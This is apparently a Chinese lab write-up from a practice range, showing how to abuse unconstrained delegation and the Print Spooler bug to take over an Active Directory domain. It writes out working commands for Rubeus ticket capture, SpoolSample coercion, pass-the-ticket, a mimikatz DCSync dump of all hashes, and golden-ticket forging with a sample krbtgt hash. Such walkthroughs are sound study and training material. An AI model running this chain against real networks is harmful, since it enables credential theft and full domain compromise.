文中主要讲解内网域环境,通过学习掌握域环境,更快知晓内网工作原理。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。
非约束委派&Spooler
这里我们利用非约束委派联合Spooler打印机的漏洞来进行演示;利用Rubeus来对域控ad1进行监听:作用就是当我们使用打印机服务强制让域控向12server2主机验证身份,Rubeus就可以监听到来自域控ad1的数据,从而截获域控的TGT;这里同样需要administrator权限去开启监听,使用域用户权限不足:
域用户下直接切换administrator权限命令如下:
runas /profile /user:12server2\administrator cmd.exe #使用runas命令切换用户
使用Rubeus来对域控ad1进行监听:
Rubeus.exe monitor /interval:1 /filteruser:ad1$ #进行监听,当域控ad1访问域用户时,则会生成TGS。
SpoolSample.exe ad1 12server2 #利用打印机服务强制让域控ad1访问12server2
将保存下来的TGS使用 powershell 转到为正常的 TGT:
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("得到的base64")) #利用脚本将得到的TGS生成TGT
将生成的凭证注入内存中:
Rubeus.exe ptt /ticket:base64 #利用Rubeus工具
使用mimikatz:
kerberos::ptt XXX.kirbi #导入凭证
从这里可以看出虽然票据已生成,但依然不能访问域控的文件:
这里我们生成的 TGT,相当于域控真正赋予了我们administrator本地管理员权限,所以这里我们就可以使用命令将krbtgt这个账号hash导出即可生成黄金票据,从而接管域控:
mimikatz.exe "lsadump::dcsync /domain:redteam.club /all /csv" "exit">log.txt
制作黄金票据,我们需要知道域用户的SID:
whoami /all #查询SID
构造黄金票据语句生成凭证:
kerberos::golden /domain:redteam.club /sid:S-1-5-21-2365300756-2663045586-4193326672 /krbtgt:b6e0fcce3106665064de4917394ccc27 /user:administrator /ticket:ntlm.kirbi
kerberos::ptt 凭证
将生成的凭证注入内存,成功访问域控的文件:
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
